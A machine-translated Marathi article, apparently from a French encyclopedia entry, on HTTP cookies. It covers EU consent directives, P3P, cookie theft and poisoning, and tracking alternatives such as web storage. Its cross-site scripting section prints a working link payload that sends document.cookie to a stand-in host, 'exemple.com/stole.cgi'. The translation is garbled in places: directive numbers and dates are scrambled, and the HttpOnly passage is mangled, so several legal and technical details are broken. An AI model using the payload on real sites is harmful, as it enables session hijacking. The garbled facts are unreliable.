ऑक्टोबर 2003 पासून अंमलात आणल्या जाणार्‍या, डिसेंबर 2004 च्या अहवालानुसार हा निर्देश केवळ अत्यंत अपूर्णपणे अंमलात आणला गेला, ज्याने असेही निदर्शनास आणले की काही सदस्य देशांनी (स्लोव्हाकिया, लाटविया, ग्रीस, बेल्जियम आणि लक्झेंबर्ग) अद्याप हस्तांतरण केलेले नाही. देशांतर्गत कायद्यात निर्देश.

29 मधील G2010 च्या मतानुसार, इंटरनेट वापरकर्त्याच्या स्पष्ट संमतीवर वर्तणुकीशी संबंधित जाहिरातींच्या हेतूंसाठी कुकीजच्या वापरावर विशेष अटी घालणारा हा निर्देश अत्यंत खराबपणे लागू राहिला आहे. खरं तर, बहुतेक साइट्स अशा प्रकारे करतात जे निर्देशांचे पालन करत नाहीत, "कुकीज" च्या वापराबद्दल माहिती न देता, "तांत्रिक" कुकीजमध्‍ये फरक न करता, "कुकीज" च्या वापराची माहिती देणार्‍या साध्या "बॅनर"पुरते मर्यादित राहतात. "ट्रॅकिंग" कुकीज, किंवा तांत्रिक कुकीज (जसे की शॉपिंग कार्ट मॅनेजमेंट कुकीज) राखण्यासाठी आणि "ट्रॅकिंग" कुकीज नाकारू इच्छिणाऱ्या वापरकर्त्याला खरी निवड देऊ नका. खरं तर, कुकीज नाकारल्या गेल्यास अनेक साइट योग्यरित्या कार्य करत नाहीत, जे निर्देश 2002/58 किंवा निर्देश 95/46 (वैयक्तिक डेटाचे संरक्षण) चे पालन करत नाहीत.

निर्देश 2009/136/CE

ही सामग्री 2009 नोव्हेंबर 136 च्या निर्देशांक 25/2009/EC द्वारे अद्ययावत केली गेली आहे ज्यात असे नमूद केले आहे की "ग्राहक किंवा वापरकर्त्याच्या टर्मिनल उपकरणांमध्ये माहितीचे संचयन, किंवा आधीपासून संग्रहित माहितीवर प्रवेश मिळवण्याची परवानगी केवळ या अटीवर आहे. ग्राहक किंवा वापरकर्त्याने, प्रक्रियेच्या उद्देशांबद्दल इतरांदरम्यान, निर्देश 95/46/EC चे पालन करून, स्पष्ट आणि संपूर्ण माहिती प्राप्त केल्यानंतर, त्याची संमती दिली आहे. त्यामुळे नवीन निर्देश इंटरनेट वापरकर्त्याच्या संगणकावर कुकीज ठेवण्यापूर्वीच्या जबाबदाऱ्यांना बळकट करते.

निर्देशाच्या प्राथमिक विचारात, युरोपियन आमदार स्पष्ट करतात: "जेथे तांत्रिकदृष्ट्या शक्य आणि प्रभावी, निर्देश 95/46/EC च्या संबंधित तरतुदींनुसार, प्रक्रियेच्या संदर्भात वापरकर्त्याची संमती याद्वारे व्यक्त केली जाऊ शकते. ब्राउझर किंवा इतर अनुप्रयोगाच्या योग्य सेटिंग्जचा वापर. परंतु प्रत्यक्षात, आजपर्यंतचा कोणताही ब्राउझर आवश्यक तांत्रिक कुकीज पर्यायी कुकीजपासून वेगळे करणे शक्य करत नाही ज्या वापरकर्त्याच्या पसंतीवर सोडल्या पाहिजेत.

हे नवीन निर्देश बेल्जियमच्या खासदारांनी जुलै 2012 मध्ये हस्तांतरित केले होते. 2014 चा अभ्यास दर्शवितो की खासदारांना देखील लागू करण्यासाठी संघर्ष करावा लागतो निर्देशाच्या मर्यादा.

P3P

P3P स्पेसिफिकेशनमध्ये सर्व्हरसाठी गोपनीयता धोरण सांगण्याची क्षमता समाविष्ट असते, जी ते कोणत्या प्रकारची माहिती संकलित करते आणि कोणत्या उद्देशाने करते हे परिभाषित करते. या धोरणांमध्ये कुकीज वापरून गोळा केलेल्या माहितीचा वापर समाविष्ट आहे (परंतु त्यापुरतेच मर्यादित नाही). P3P च्या व्याख्येनुसार, ब्राउझर गोपनीयता धोरणांची वापरकर्त्याच्या प्राधान्यांशी तुलना करून किंवा वापरकर्त्याला विचारून, सर्व्हरद्वारे घोषित गोपनीयता धोरण गोपनीयता विधान सादर करून कुकीज स्वीकारू किंवा नाकारू शकतो.

Apple Safari आणि Microsoft Internet Explorer आवृत्ती 6 आणि 7 सह अनेक ब्राउझर, P3P ला समर्थन देतात जे ब्राउझरला तृतीय पक्ष कुकी संचयन स्वीकारायचे की नाही हे निर्धारित करण्यास अनुमती देते. ऑपेरा ब्राउझर वापरकर्त्यांना तृतीय-पक्ष कुकीज नाकारण्याची आणि इंटरनेट डोमेनसाठी जागतिक आणि विशिष्ट सुरक्षा प्रोफाइल तयार करण्याची परवानगी देतो. Mozilla Firefox आवृत्ती 2 ने P3P समर्थन सोडला परंतु आवृत्ती 3 मध्ये तो पुन्हा स्थापित केला.

वापरकर्त्याच्या वेब अनुभवावर नकारात्मक परिणाम न करता, गोपनीयता वाढवण्यासाठी आणि जाहिरात ट्रॅकिंग कमी करण्यासाठी तृतीय-पक्ष कुकीज बहुतेक ब्राउझरद्वारे अवरोधित केल्या जाऊ शकतात. अनेक जाहिरात संस्था एक पर्याय देतात निवड रद्द करा लक्ष्यित जाहिरातींसाठी, ब्राउझरमध्ये जेनेरिक कुकी सेट करून जे हे लक्ष्यीकरण निष्क्रिय करते, परंतु असे उपाय व्यावहारिकदृष्ट्या प्रभावी नसतात, जेव्हा त्याचा आदर केला जातो, कारण वापरकर्त्याने या कुकीज हटवल्याबरोबर ही सामान्य कुकी मिटवली जाते ज्यामुळे ही निवड रद्द होते. निर्णय बाहेर.

कुकीजचे तोटे

गोपनीयतेच्या समस्यांव्यतिरिक्त, कुकीजमध्ये काही तांत्रिक दोष देखील आहेत. विशेषतः, ते नेहमी वापरकर्त्यांना अचूकपणे ओळखत नाहीत, जेव्हा ते मोठ्या संख्येने साइट कार्यप्रदर्शन कमी करू शकतात, तेव्हा ते सुरक्षा हल्ल्यांसाठी वापरले जाऊ शकतात आणि ते प्रतिनिधी राज्य हस्तांतरण, सॉफ्टवेअरच्या आर्किटेक्चरल शैलीशी विरोधाभास करतात.

अस्पष्ट ओळख

संगणकावर एकापेक्षा जास्त ब्राउझर वापरले असल्यास, त्या प्रत्येकामध्ये कुकीजसाठी नेहमीच स्वतंत्र स्टोरेज युनिट असते. म्हणून कुकीज एखाद्या व्यक्तीला ओळखत नाहीत, परंतु वापरकर्ता खाते, संगणक आणि वेब ब्राउझरचे संयोजन. अशा प्रकारे, कोणीही ही खाती, संगणक किंवा ब्राउझर वापरू शकतो ज्यांच्याकडे कुकीज आहेत. त्याचप्रमाणे, एकच वापरकर्ता खाते, संगणक आणि ब्राउझर सामायिक करणार्‍या एकाधिक वापरकर्त्यांमध्ये कुकीज फरक करत नाहीत, जसे की “इंटरनेट कॅफे” किंवा संगणक संसाधनांमध्ये विनामूल्य प्रवेश देणार्‍या कोणत्याही ठिकाणी.

परंतु व्यवहारात हे विधान बहुतेक प्रकरणांमध्ये चुकीचे ठरते कारण आज "वैयक्तिक" संगणक (किंवा स्मार्टफोन किंवा टॅबलेट, जे अधिक वाईट आहे) मुख्यतः एक व्यक्ती वापरतात. हे विशिष्ट व्यक्तीला लक्ष्य करण्यासारखे आहे आणि संकलित केलेल्या माहितीच्या प्रमाणात व्यक्ती "नाव" ओळखली नसली तरीही वैयक्तिक लक्ष्यापर्यंत पोहोचते.

कुकीजची चोरी

नेटवर्कवरील दुसर्‍या संगणकाद्वारे कुकी चोरली जाऊ शकते.

सामान्य ऑपरेशन दरम्यान, सर्व्हर (किंवा त्याच डोमेनमधील सर्व्हरचा समूह) आणि वापरकर्त्याच्या संगणक ब्राउझरमध्ये कुकीज परत पाठवल्या जातात. कुकीजमध्ये संवेदनशील माहिती (वापरकर्तानाव, प्रमाणीकरणासाठी वापरलेला पासवर्ड इ.) असू शकत असल्याने, त्यांची मूल्ये इतर संगणकांवर प्रवेश करण्यायोग्य नसावीत. कुकी चोरी ही अनधिकृत तृतीय पक्षाद्वारे कुकीजमध्ये व्यत्यय आणणारी कृती आहे.

सेशन हायजॅकिंग नावाच्या हल्ल्यात कुकीज पॅकेट स्निफरद्वारे चोरल्या जाऊ शकतात. पाठवणार्‍या आणि प्राप्त करणार्‍यांपेक्षा इतर संगणकांद्वारे नेटवरील रहदारी रोखली आणि वाचली जाऊ शकते (विशेषत: एनक्रिप्ट न केलेल्या सार्वजनिक वाय-फाय जागेवर). या ट्रॅफिकमध्ये साधा HTTP प्रोटोकॉल वापरून सत्रांवर पाठवलेल्या कुकीजचा समावेश होतो. जेव्हा नेटवर्क रहदारी एन्क्रिप्ट केलेली नसते, तेव्हा दुर्भावनायुक्त वापरकर्ते अशा प्रकारे "पॅकेट स्निफर्स" वापरून नेटवर्कवरील इतर वापरकर्त्यांचे संप्रेषण वाचू शकतात.

HTTPS प्रोटोकॉल वापरून वापरकर्त्याच्या संगणक आणि सर्व्हरमधील कनेक्शन एनक्रिप्ट करून ही समस्या दूर केली जाऊ शकते. सर्व्हर निर्दिष्ट करू शकतो a सुरक्षित ध्वज कुकी सेट करताना; ब्राउझर ते फक्त एका सुरक्षित ओळीवर पाठवेल, जसे की SSL कनेक्शन.

तथापि, बर्‍याच साइट, जरी वापरकर्ता प्रमाणीकरणासाठी HTTPS एन्क्रिप्टेड संप्रेषण वापरत असल्या तरी (म्हणजे लॉगिन पृष्ठ), नंतर कार्यक्षमतेच्या कारणास्तव एनक्रिप्ट न केलेल्या HTTP कनेक्शनद्वारे सत्र कुकीज आणि इतर डेटा सामान्यपणे पाठवतात. हल्लेखोर अशा प्रकारे इतर वापरकर्त्यांच्या कुकीजमध्ये अडथळा आणू शकतात आणि योग्य साइटवर त्यांची तोतयागिरी करू शकतात किंवा कुकी हल्ल्यांमध्ये त्यांचा वापर करू शकतात.

साइटमध्ये स्क्रिप्टिंग: एक कुकी जी केवळ सर्व्हर आणि क्लायंटमध्येच बदलली पाहिजे ती दुसर्या तृतीय पक्षाला पाठविली जाते.

कुकीज चोरण्याचा दुसरा मार्ग म्हणजे साइट्स स्क्रिप्ट करणे आणि ब्राउझरने स्वतःच दुर्भावनापूर्ण सर्व्हरवर कुकीज पाठवल्या ज्या त्या कधीही प्राप्त करत नाहीत. आधुनिक ब्राउझर सर्व्हरवरून कोडचे मागवलेले भाग अंमलात आणण्याची परवानगी देतात. रनटाइम दरम्यान कुकीज ऍक्सेस केल्या गेल्यास, त्यांची व्हॅल्यू काही स्वरूपात सर्व्हरला कळवली जाऊ शकतात ज्यांनी त्यांना ऍक्सेस करू नये. कुकीज नेटवर्कवर पाठवण्यापूर्वी एनक्रिप्ट केल्याने हल्ला रोखण्यात मदत होत नाही.

या प्रकारची इन-साइट स्क्रिप्टिंग वापरकर्त्यांना HTML सामग्री पोस्ट करण्याची अनुमती देणार्‍या साइटवर आक्रमणकर्ते वापरतात. HTML योगदानामध्ये सुसंगत कोडचा एक भाग समाकलित करून, आक्रमणकर्ता इतर वापरकर्त्यांकडून कुकीज प्राप्त करू शकतो. या कुकीजचे ज्ञान चोरलेल्या कुकीज वापरून त्याच साइटशी कनेक्ट करून वापरले जाऊ शकते, अशा प्रकारे ज्या वापरकर्त्याच्या कुकीज चोरल्या गेल्या आहेत म्हणून ओळखले जाऊ शकते.

असे हल्ले रोखण्याचा एक मार्ग म्हणजे HttpOnly ध्वज वापरणे; हा एक पर्याय आहे, जो PHP मध्ये इंटरनेट एक्सप्लोररच्या आवृत्ती 6 पासून आवृत्ती 5.2.0 पासून सादर केला गेला आहे जो स्क्रिप्टच्या जवळ असलेल्या क्लायंटसाठी कुकीला प्रवेश करण्यायोग्य बनवण्यासाठी नियोजित आहे. तथापि, वेब डेव्हलपर्सनी त्यांच्या साइट डेव्हलपमेंटमध्ये हे लक्षात घेतले पाहिजे जेणेकरुन ते साइटवर स्क्रिप्टिंगपासून मुक्त असतील.

वापरला जाणारा आणखी एक सुरक्षितता धोका म्हणजे साइटमध्ये मागणी तयार करणे.

अधिकृत तांत्रिक तपशील कुकीज ज्या डोमेनमधून उद्भवल्या त्या सर्व्हरवर परत पाठवण्याची परवानगी देते. तथापि, कुकीजचे मूल्य कुकी शीर्षलेखांव्यतिरिक्त इतर माध्यमांचा वापर करून इतर सर्व्हरवर पाठविले जाऊ शकते.

विशेषतः, JavaScript सारख्या स्क्रिप्टिंग भाषांना सामान्यतः कुकी मूल्यांमध्ये प्रवेश करण्याची परवानगी आहे आणि इंटरनेटवरील कोणत्याही सर्व्हरवर अनियंत्रित मूल्ये पाठविण्यास सक्षम आहेत. ही स्क्रिप्टिंग क्षमता वापरकर्त्यांना इतर वापरकर्त्यांना पाहण्यासाठी HTML सामग्री पोस्ट करण्याची परवानगी देणार्‍या वेबसाइटवरून वापरली जाते.

उदाहरणार्थ, example.com डोमेनवर कार्यरत असलेला आक्रमणकर्ता एखाद्या लोकप्रिय ब्लॉगकडे निर्देशित करणारी खालील लिंक असलेली टिप्पणी पोस्ट करू शकतो जो अन्यथा नियंत्रित करत नाही:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

जेव्हा दुसरा वापरकर्ता या दुव्यावर क्लिक करतो, तेव्हा ब्राउझर कोडचा ऑनक्लिक विशेषता भाग कार्यान्वित करतो, म्हणून ते document.cookie स्ट्रिंगला या पृष्ठासाठी सक्रिय असलेल्या वापरकर्त्याच्या कुकीजच्या सूचीसह पुनर्स्थित करते. त्यामुळे, कुकीजची ही यादी example.com सर्व्हरवर पाठवली जाते आणि त्यामुळे आक्रमणकर्ता या वापरकर्त्याच्या कुकीज गोळा करू शकतो.

या प्रकारचा हल्ला वापरकर्त्याच्या बाजूने शोधणे कठीण आहे कारण स्क्रिप्ट त्याच डोमेनवरून येते ज्याने कुकी सेट केली आहे आणि मूल्ये पाठविण्याचे ऑपरेशन त्या डोमेनद्वारे अधिकृत असल्याचे दिसते. दुर्भावनापूर्ण कोडचे प्रकाशन रोखण्यासाठी प्रतिबंध घालणे ही या प्रकारची साइट चालविणाऱ्या प्रशासकांची जबाबदारी आहे असे मानले जाते.

JavaScript सारख्या क्लायंट-साइड प्रोग्रामवर कुकीज थेट HttpOnly ध्वजासह पाठवल्या गेल्या असतील तर त्या थेट दिसत नाहीत. सर्व्हरच्या दृष्टिकोनातून, फरक एवढाच आहे की सेट-कुकी हेडरच्या ओळीत HttpOnly स्ट्रिंग असलेले नवीन फील्ड जोडले आहे:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

जेव्हा ब्राउझरला अशी कुकी प्राप्त होते, तेव्हा ती सामान्यपणे खालील HTTP एक्सचेंजमध्ये वापरली जाते, परंतु क्लायंटच्या बाजूने कार्यान्वित केलेल्या स्क्रिप्ट्सना दृश्यमान न करता. HttpOnly ध्वज कोणत्याही अधिकृत तांत्रिक तपशीलाचा भाग नाही आणि सर्व ब्राउझरमध्ये लागू केला जात नाही. XMLHTTPRrequest पद्धतीद्वारे सत्र कुकीजचे वाचन आणि लेखन रोखण्याचा सध्या कोणताही मार्ग नाही याची नोंद घ्या.

सामग्रीमध्ये बदल: आक्रमणकर्ता सर्व्हरवर अवैध कुकी पाठवतो, शक्यतो सर्व्हरने पाठवलेल्या वैध कुकीपासून बनविलेले असते.

कुकीज बदलत आहे

कुकीज संचयित करणे आणि सर्व्हरवर न बदलता परत करणे आवश्यक आहे, आक्रमणकर्ता कुकीज सर्व्हरवर परत पाठवण्यापूर्वी त्यांचे मूल्य सुधारू शकतो. उदाहरणार्थ, एखाद्या कुकीमध्ये वापरकर्त्याला स्टोअरच्या शॉपिंग कार्टमध्ये ठेवलेल्या वस्तूंसाठी भरावे लागणारे एकूण मूल्य असल्यास, हे मूल्य बदलल्याने सर्व्हरला आक्रमणकर्त्याकडून सुरुवातीच्या किंमतीपेक्षा कमी शुल्क आकारण्याचा धोका निर्माण होतो. कुकीजचे मूल्य बदलण्याची प्रक्रिया म्हणतात कुकी विषबाधा आणि हल्ला कायम ठेवण्यासाठी कुकी चोरीनंतर वापरला जाऊ शकतो.

कुकी ओव्हरराइड पद्धतीमध्ये, आक्रमणकर्ता सर्व्हरवर अवैध कुकी पाठवण्यासाठी ब्राउझरमधील त्रुटीचा फायदा घेतो.

तथापि, बर्‍याच वेबसाइट फक्त सत्र आयडी संग्रहित करतात — यादृच्छिकपणे व्युत्पन्न केलेला अनन्य क्रमांक जो सत्र वापरकर्त्याला ओळखण्यासाठी वापरला जातो — कुकीमध्येच, इतर सर्व माहिती सर्व्हरवर संग्रहित केली जाते. या प्रकरणात, ही समस्या मोठ्या प्रमाणात सोडविली जाते.

वेबसाइट्स दरम्यान कुकी हाताळणी

प्रत्येक साइटच्या स्वतःच्या कुकीज असणे अपेक्षित आहे, त्यामुळे एक साइट दुसर्‍या साइटशी संबंधित कुकीज सुधारू किंवा तयार करू शकत नाही. वेब ब्राउझर सुरक्षा दोष दुर्भावनापूर्ण साइटला हा नियम तोडण्याची अनुमती देऊ शकते. अशा दोषाचे शोषण सामान्यतः असे म्हटले जाते क्रॉस-साइट स्वयंपाक. अशा हल्ल्यांचा उद्देश सत्र आयडी चोरी असू शकतो.

वापरकर्त्यांनी वेब ब्राउझरच्या नवीनतम आवृत्त्या वापरल्या पाहिजेत ज्यामध्ये या भेद्यता अक्षरशः काढून टाकल्या जातात.

क्लायंट आणि सर्व्हरमधील परस्परविरोधी स्थिती

कुकीजच्या वापरामुळे क्लायंटची स्थिती आणि कुकीमध्ये साठवलेली स्थिती यांच्यात विरोधाभास निर्माण होऊ शकतो. जर वापरकर्त्याने कुकी मिळवली आणि ब्राउझरच्या "मागे" बटणावर क्लिक केले, तर ब्राउझरची स्थिती सामान्यतः या संपादनापूर्वीसारखी नसते. उदाहरणार्थ, जर ऑनलाइन स्टोअरची बास्केट कुकीज वापरून तयार केली गेली असेल, तर वापरकर्ता ब्राउझर इतिहासाकडे परत येतो तेव्हा बास्केटची सामग्री बदलू शकत नाही: जर वापरकर्त्याने त्याच्या टोपलीमध्ये लेख जोडण्यासाठी बटण दाबले आणि "रिटर्न" वर क्लिक केले. " बटण, लेख यातच राहील. हा वापरकर्त्याचा हेतू असू शकत नाही, ज्यांना लेखाची भर घालणे निश्चितपणे रद्द करायचे आहे. यामुळे अविश्वसनीयता, गोंधळ आणि बग होऊ शकतात. त्यामुळे वेब डेव्हलपर्सनी या समस्येची जाणीव ठेवली पाहिजे आणि अशा परिस्थिती हाताळण्यासाठी उपाययोजना अंमलात आणल्या पाहिजेत.

कुकी कालबाह्य

पर्सिस्टंट कुकीजवर प्रायव्हसी सिक्युरिटी तज्ञांनी टीका केली आहे की ती लवकर कालबाह्य होण्यासाठी सेट केली जात नाही, ज्यामुळे वेबसाइट्सना वापरकर्त्यांचा मागोवा घेण्याची आणि कालांतराने त्यांचे प्रोफाइल तयार करण्याची परवानगी मिळते. कुकीजचा हा पैलू देखील सत्र अपहरण समस्येचा एक भाग आहे, कारण चोरीला गेलेली पर्सिस्टंट कुकी वापरकर्त्याची तोतयागिरी करण्यासाठी वापरली जाऊ शकते.

हे देखील वाचण्यासाठी: गफाम: ते कोण आहेत? ते (कधी कधी) इतके भितीदायक का असतात?

कुकीजसाठी पर्याय

कुकीज वापरून करता येणारी काही ऑपरेशन्स कुकीजला बायपास करणार्‍या किंवा हटवलेल्या कुकीज पुन्हा तयार करणार्‍या इतर यंत्रणा वापरून देखील केल्या जाऊ शकतात, ज्यामुळे कुकीज पेक्षा गोपनीयतेच्या समस्या तशाच (किंवा कधी कधी अदृश्य असल्यामुळे वाईट) निर्माण होतात.

आयपी पत्ता

पृष्ठावर कॉल करणार्‍या संगणकाच्या आयपी पत्त्याद्वारे वापरकर्त्यांचा मागोवा घेतला जाऊ शकतो. हे तंत्र वर्ल्ड वाईड वेबच्या प्रारंभापासून उपलब्ध आहे, कारण पृष्ठे डाउनलोड केली जातात तेव्हा सर्व्हर ब्राउझर किंवा प्रॉक्सी चालवणाऱ्या संगणकाच्या IP पत्त्याची विनंती करतो, जर कोणताही वापरला नसेल. कुकीज वापरात आहेत की नाही हे सर्व्हर या माहितीचा मागोवा घेऊ शकतो. तथापि, हे पत्ते सामान्यत: कुकीजपेक्षा वापरकर्त्याला ओळखण्यासाठी कमी विश्वासार्ह असतात कारण संगणक आणि प्रॉक्सी एकाधिक वापरकर्त्यांद्वारे सामायिक केले जाऊ शकतात आणि प्रत्येक कामाच्या सत्रात समान संगणक वेगळा IP पत्ता प्राप्त करू शकतो (जसे की अनेकदा टेलिफोन कनेक्शनसाठी) .

IP पत्त्यांद्वारे ट्रॅक करणे काही परिस्थितींमध्ये विश्वासार्ह असू शकते, जसे की ब्रॉडबँड कनेक्शन जे एकच IP पत्ता दीर्घकाळ टिकवून ठेवतात, जोपर्यंत पॉवर चालू असते.

Tor सारख्या काही प्रणाली इंटरनेटची निनावी ठेवण्यासाठी आणि IP पत्त्याद्वारे ट्रॅकिंग अशक्य किंवा अव्यवहार्य बनवण्यासाठी डिझाइन केल्या आहेत.

URL

अधिक अचूक तंत्र URL मध्ये माहिती एम्बेड करण्यावर आधारित आहे. URL चा क्वेरी स्ट्रिंग भाग हे एक तंत्र आहे जे सामान्यत: या उद्देशासाठी वापरले जाते, परंतु इतर भाग देखील वापरले जाऊ शकतात. कुकीज सक्षम नसल्यास Java सर्व्हरलेट आणि PHP सत्र यंत्रणा दोन्ही ही पद्धत वापरतात.

या पद्धतीमध्ये वेब सर्व्हर ब्राउझरला पाठवल्यावर ते घेऊन जाणार्‍या वेब पेजच्या लिंक्सवर स्ट्रिंग विनंत्या जोडते. जेव्हा वापरकर्ता दुव्याचे अनुसरण करतो, तेव्हा ब्राउझर संलग्न क्वेरी स्ट्रिंग सर्व्हरला परत करतो.

या उद्देशासाठी वापरल्या जाणार्‍या क्वेरी स्ट्रिंग आणि कुकीज खूप समान आहेत, दोन्ही माहिती सर्व्हरद्वारे अनियंत्रितपणे निवडलेली आणि ब्राउझरद्वारे परत केलेली आहे. तथापि, काही फरक आहेत: जेव्हा क्वेरी स्ट्रिंग असलेली URL पुन्हा वापरली जाते, तेव्हा तीच माहिती सर्व्हरला पाठविली जाते. उदाहरणार्थ, जर वापरकर्त्याची प्राधान्ये URL च्या क्वेरी स्ट्रिंगमध्ये एन्कोड केलेली असतील आणि वापरकर्त्याने ती URL दुसर्‍या वापरकर्त्याला ईमेलद्वारे पाठवली, तर तो वापरकर्ता देखील ती प्राधान्ये वापरण्यास सक्षम असेल.

दुसरीकडे, जेव्हा वापरकर्ता एकाच पृष्ठावर दोनदा प्रवेश करतो, तेव्हा समान क्वेरी स्ट्रिंग दोन्ही वेळा वापरली जाईल याची कोणतीही हमी नाही. उदाहरणार्थ, जर वापरकर्ता प्रथमच अंतर्गत साइट पृष्ठावरून पृष्ठावर उतरला आणि दुसर्‍या वेळी बाह्य पृष्ठावरून त्याच पृष्ठावर उतरला, तर साइट पृष्ठाशी संबंधित क्वेरी स्ट्रिंग सामान्यत: भिन्न असते, तर कुकीज समान असतात. .

क्वेरी स्ट्रिंगचे इतर तोटे सुरक्षेशी संबंधित आहेत: क्वेरी स्ट्रिंगमध्ये सत्र ओळखणारा डेटा ठेवणे सेशन फिक्सेशन हल्ले, आयडेंटिफायर रेफरन्स हल्ले आणि इतर शोषणे सक्षम किंवा सुलभ करते. HTTP कुकीज म्हणून सत्र आयडी पास करणे अधिक सुरक्षित आहे.

लपलेले फॉर्म फील्ड

ASP.NET द्वारे वापरलेले सत्र ट्रॅकिंगचे एक प्रकार, लपविलेल्या फील्डसह वेब फॉर्म वापरणे आहे. हे तंत्र माहिती घेऊन जाण्यासाठी URL क्वेरी स्ट्रिंग वापरण्यासारखे आहे आणि त्याचे समान फायदे आणि तोटे आहेत; आणि जर HTTP GET पद्धतीने फॉर्मवर प्रक्रिया केली गेली, तर फील्ड प्रत्यक्षात ब्राउझरच्या URL चा भाग बनतात जे फॉर्म सबमिट करताना पाठवतील. परंतु बहुतेक फॉर्मवर HTTP POST सह प्रक्रिया केली जाते, ज्यामुळे फॉर्म माहिती, लपविलेल्या फील्डसह, अतिरिक्त इनपुट म्हणून जोडली जाते जी URL किंवा कुकीचा भाग नाही.

ट्रॅकिंगच्या दृष्टिकोनातून या दृष्टिकोनाचे दोन फायदे आहेत: प्रथम, URL ऐवजी HTML स्त्रोत कोड आणि POST इनपुटमध्ये ठेवलेल्या माहितीचा मागोवा घेणे सरासरी वापरकर्त्यास हे ट्रॅकिंग टाळण्यास अनुमती देईल; दुसरे, जेव्हा वापरकर्ता URL कॉपी करतो तेव्हा सत्र माहिती कॉपी केली जात नाही (उदाहरणार्थ, पृष्ठ डिस्कवर सेव्ह करण्यासाठी किंवा ईमेलद्वारे पाठवण्यासाठी).

window.name

सर्व सामान्य वेब ब्राउझर DOM च्या window.name गुणधर्माचा वापर करून JavaScript द्वारे मोठ्या प्रमाणात डेटा (2MB ते 32MB) संचयित करू शकतात. हा डेटा सत्र कुकीजऐवजी वापरला जाऊ शकतो आणि डोमेनवर देखील वापरला जातो. क्लायंट-साइड सत्र व्हेरिएबल्सचा एक जटिल संच संचयित करण्यासाठी तंत्र JSON ऑब्जेक्ट्ससह जोडले जाऊ शकते.

नकारात्मक बाजू अशी आहे की प्रत्येक स्वतंत्र विंडो किंवा टॅबमध्ये सुरुवातीला रिक्त window.name असेल; टॅबद्वारे ब्राउझिंग करताना (वापरकर्त्याद्वारे उघडलेले) याचा अर्थ असा की स्वतंत्रपणे उघडलेल्या टॅबला विंडोचे नाव नसते. याव्यतिरिक्त window.name चा वापर वेगवेगळ्या साइटवरील अभ्यागतांचा मागोवा घेण्यासाठी केला जाऊ शकतो ज्यामुळे गोपनीयतेची समस्या उद्भवू शकते.

सर्व्हरचा सहभाग नसल्यामुळे काही बाबतीत हे कुकीजपेक्षा अधिक सुरक्षित असू शकते, त्यामुळे स्निफर कुकीजच्या नेटवर्क हल्ल्यासाठी ते असुरक्षित बनते. तथापि, डेटाचे संरक्षण करण्यासाठी विशेष उपाययोजना केल्या गेल्यास, तो पुढील हल्ल्यांना असुरक्षित आहे, कारण डेटा त्याच विंडोमध्ये उघडलेल्या इतर साइटद्वारे उपलब्ध आहे.

HTTP प्रमाणीकरण

HTTP प्रोटोकॉलमध्ये मूलभूत प्रवेश प्रमाणीकरण प्रोटोकॉल आणि प्रवेश प्रमाणीकरण डायजेस्ट समाविष्ट आहे, जे वापरकर्त्याने वापरकर्तानाव आणि पासवर्ड दिल्यावरच वेब पृष्ठावर प्रवेश करण्याची परवानगी देते. योग्य पास. सर्व्हरने वेब पृष्ठावर प्रवेश देण्यासाठी प्रमाणपत्राची विनंती केल्यास, ब्राउझर वापरकर्त्याकडून त्याची विनंती करतो आणि एकदा प्राप्त झाल्यानंतर, ब्राउझर ते संचयित करतो आणि त्यानंतरच्या सर्व HTTP विनंत्यांमध्ये पाठवतो. ही माहिती वापरकर्त्याचा मागोवा घेण्यासाठी वापरली जाऊ शकते.

स्थानिक सामायिक ऑब्जेक्ट

ब्राउझरमध्ये Adobe Flash Player प्लगइन समाविष्ट असल्यास, स्थानिक सामायिक वस्तू कुकीज सारख्याच उद्देशासाठी वापरला जाऊ शकतो. वेब डेव्हलपरसाठी ते एक आकर्षक पर्याय असू शकतात कारण:

• स्थानिक सामायिक ऑब्जेक्टसाठी डीफॉल्ट आकार मर्यादा 100 KB आहे;
• सुरक्षा तपासण्या वापरकर्त्याच्या कुकी तपासण्यांपासून वेगळ्या असतात (म्हणून कुकीज नसताना स्थानिक सामायिक वस्तूंना परवानगी दिली जाऊ शकते).

हा शेवटचा मुद्दा, जो कुकी व्यवस्थापन धोरणाला Adobe च्या स्थानिक सामायिक केलेल्या वस्तूंपासून वेगळे करतो प्रश्न उपस्थित करते त्याच्या गोपनीयता सेटिंग्जच्या वापरकर्त्याद्वारे व्यवस्थापनाबद्दल: त्याला हे माहित असले पाहिजे की त्याच्या कुकीजच्या व्यवस्थापनाचा स्थानिक सामायिक केलेल्या वस्तूंच्या व्यवस्थापनावर कोणताही प्रभाव पडत नाही आणि त्याउलट.

या प्रणालीची आणखी एक टीका अशी आहे की ती केवळ Adobe Flash Player प्लगइनद्वारे वापरली जाऊ शकते जी मालकीची आहे आणि वेब मानक नाही.

क्लायंट-साइड चिकाटी

काही वेब ब्राउझर स्क्रिप्ट-आधारित पर्सिस्टन्स मेकॅनिझमला सपोर्ट करतात, जे पेजला नंतरच्या वापरासाठी स्थानिक पातळीवर माहिती साठवण्याची परवानगी देते. इंटरनेट एक्सप्लोरर, उदाहरणार्थ, ब्राउझर इतिहास, बुकमार्क, XML मध्ये संग्रहित स्वरूपात किंवा थेट डिस्कवर जतन केलेल्या वेब पृष्ठासह सतत माहितीचे समर्थन करते. Microsoft Internet Explorer 5 साठी, DHTML वर्तणुकीद्वारे वापरकर्ता-डेटा पद्धत उपलब्ध आहे.

W3C ने HTML 5 मध्ये क्लायंट-साइड डेटा स्टोरेजसाठी वेब स्टोरेज नावाचे नवीन JavaScript API सादर केले आणि कुकीज कायमस्वरूपी बदलण्याचे उद्दिष्ट ठेवले. हे कुकीजसारखेच आहे परंतु मोठ्या प्रमाणात सुधारित क्षमतेसह आणि HTTP विनंतीच्या शीर्षलेखामध्ये माहिती संचयित न करता. API दोन प्रकारच्या वेब स्टोरेजला अनुमती देते: लोकल स्टोरेज आणि सेशन स्टोरेज, पर्सिस्टंट कुकीज आणि सेशन कुकीज प्रमाणेच (ते सत्र कुकीज वगळता ब्राउझर बंद असताना कालबाह्य होतात. सत्र संचयन टॅब बंद केल्यावर कालबाह्य होईल), अनुक्रमे. वेब स्टोरेज Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 आणि Opera 10.50 द्वारे समर्थित आहे.

